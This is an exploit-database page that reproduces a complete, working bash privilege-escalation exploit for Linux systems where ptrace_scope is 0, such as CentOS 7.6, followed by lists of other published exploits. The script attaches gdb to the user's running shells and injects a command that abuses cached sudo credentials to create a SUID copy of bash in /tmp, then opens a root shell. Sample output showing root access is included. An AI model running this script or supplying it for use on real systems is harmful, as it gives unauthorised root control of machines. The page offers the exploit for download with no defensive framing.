"CentOS 7.6 - 'ptrace_scope' Privilege Escalation"

Author

Exploit author

s4vitar

Platform

Exploit platform

linux

Release date

Exploit published date

2019-06-14

 Download file
#!/usr/bin/env bash

#######################################################
#                                                     #
#           'ptrace_scope' misconfiguration           #
#              Local Privilege Escalation             #
#                                                     #
#######################################################

# Affected operating systems (TESTED):
# 	Parrot Home/Workstation    4.6 (Latest Version)
#       Parrot Security            4.6 (Latest Version)
#	CentOS / RedHat            7.6 (Latest Version)
#	Kali Linux              2018.4 (Latest Version)

# Authors: Marcelo Vazquez  (s4vitar)
# 	   Victor Lasa       (vowkin)

#┌─[s4vitar@parrot]─[~/Desktop/Exploit/Privesc]
#└──╼ $./exploit.sh
#
#[*] Checking if 'ptrace_scope' is set to 0... [√]
#[*] Checking if 'GDB' is installed...         [√]
#[*] System seems vulnerable!                  [√]
#
#[*] Starting attack...
#[*] PID -> sh
#[*] Path 824: /home/s4vitar
#[*] PID -> bash
#[*] Path 832: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> bash
#[*] Path 1816: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> bash
#[*] Path 1842: /home/s4vitar
#[*] PID -> bash
#[*] Path 1852: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> bash
#[*] Path 1857: /home/s4vitar/Desktop/Exploit/Privesc
#
#[*] Cleaning up...                            [√]
#[*] Spawning root shell...                    [√]
#
#bash-4.4# whoami
#root
#bash-4.4# id
#uid=1000(s4vitar) gid=1000(s4vitar) euid=0(root) egid=0(root) grupos=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),136(scanner),1000(s4vitar)
#bash-4.4#


function startAttack(){
  tput civis && pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d' | while read shell_pid; do
    if [ $(cat /proc/$shell_pid/comm 2>/dev/null) ] || [ $(pwdx $shell_pid 2>/dev/null) ]; then
      echo "[*] PID -> "$(cat "/proc/$shell_pid/comm" 2>/dev/null)
      echo "[*] Path $(pwdx $shell_pid 2>/dev/null)"
    fi; echo 'call system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")' | gdb -q -n -p "$shell_pid" >/dev/null 2>&1
    done

    if [ -f /tmp/bash ]; then
      /tmp/bash -p -c 'echo -ne "\n[*] Cleaning up..."
                       rm /tmp/bash
                       echo -e "                            [√]"
                       echo -ne "[*] Spawning root shell..."
                       echo -e "                    [√]\n"
                       tput cnorm && bash -p'
    else
      echo -e "\n[*] Could not copy SUID to /tmp/bash          [✗]"
    fi
}

echo -ne "[*] Checking if 'ptrace_scope' is set to 0..."
if grep -q "0" < /proc/sys/kernel/yama/ptrace_scope; then
  echo " [√]"
  echo -ne "[*] Checking if 'GDB' is installed..."
  if command -v gdb >/dev/null 2>&1; then
    echo -e "         [√]"
    echo -e "[*] System seems vulnerable!                  [√]\n"
    echo -e "[*] Starting attack..."

    startAttack

  else
    echo "         [✗]"
    echo "[*] System is NOT vulnerable :(               [✗]"
  fi
else
  echo " [✗]"
  echo "[*] System is NOT vulnerable :(               [✗]"
fi; tput cnorm

Release Date	Title	Type	Platform	Author
2020-08-05	"ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)"	dos	windows	MegaMagnus
2020-08-05	"Stock Management System 1.0 - Authentication Bypass"	webapps	php	"Adeeb Shah"
2020-08-05	"QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)"	dos	windows	"Luis Martínez"
2020-08-04	"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)"	dos	windows	"Luis Martínez"
2020-08-04	"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)"	webapps	python	"Luis Vacacas"
2020-08-04	"Daily Expenses Management System 1.0 - 'username' SQL Injection"	webapps	php	"Daniel Ortiz"
2020-08-04	"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)"	dos	windows	"Luis Martínez"
2020-07-30	"Online Shopping Alphaware 1.0 - Authentication Bypass"	webapps	php	"Ahmed Abbas"
2020-07-29	"Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting"	webapps	php	"Jinson Varghese Behanan"
2020-07-29	"Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion"	webapps	hardware	0xmmnbassel

Release Date	Title	Type	Platform	Author
2020-07-10	"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution"	remote	linux	SpicyItalian
2020-07-06	"Grafana 7.0.1 - Denial of Service (PoC)"	dos	linux	mostwanted002
2020-07-06	"BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution"	webapps	linux	"Critical Start"
2020-07-05	"BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution (PoC)"	webapps	linux	"Budi Khoirudin"
2020-06-02	"vCloud Director 9.7.0.15498291 - Remote Code Execution"	remote	linux	aaronsvk
2020-05-26	"Pi-hole 4.4.0 - Remote Code Execution (Authenticated)"	webapps	linux	Photubias
2020-05-10	"Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation"	webapps	linux	"Nick Frichette"
2020-05-10	"Pi-hole < 4.4 - Authenticated Remote Code Execution"	webapps	linux	"Nick Frichette"
2020-04-22	"Mahara 19.10.2 CMS - Persistent Cross-Site Scripting"	webapps	linux	Vulnerability-Lab
2020-04-20	"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)"	remote	linux	Metasploit

Release Date	Title	Type	Platform	Author
2019-10-16	"X.Org X Server 1.20.4 - Local Stack Overflow"	local	linux	s4vitar
2019-06-14	"CentOS 7.6 - 'ptrace_scope' Privilege Escalation"	local	linux	s4vitar
2019-06-10	"Ubuntu 18.04 - 'lxd' Privilege Escalation"	local	linux	s4vitar
2019-03-15	"NetData 1.13.0 - HTML Injection"	webapps	multiple	s4vitar
2019-02-28	"FTP Server 1.32 - Denial of Service"	dos	android	s4vitar
2019-02-21	"ScreenStream 3.0.15 - Denial of Service"	dos	android	s4vitar
2019-02-21	"AirDrop 2.0 - Denial of Service (DoS)"	dos	android	s4vitar
2019-02-15	"AirMore 1.6.1 - Denial of Service (PoC)"	dos	android	s4vitar
2019-02-14	"ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC)"	dos	android	s4vitar
2019-02-11	"AirDroid 4.2.1.6 - Denial of Service"	dos	android	s4vitar

import requests

response = requests.get('https://www.nmmapper.com/api/exploitdetails/46989/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Search for hundreds of thousands of exploits

"CentOS 7.6 - 'ptrace_scope' Privilege Escalation"

Download file

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.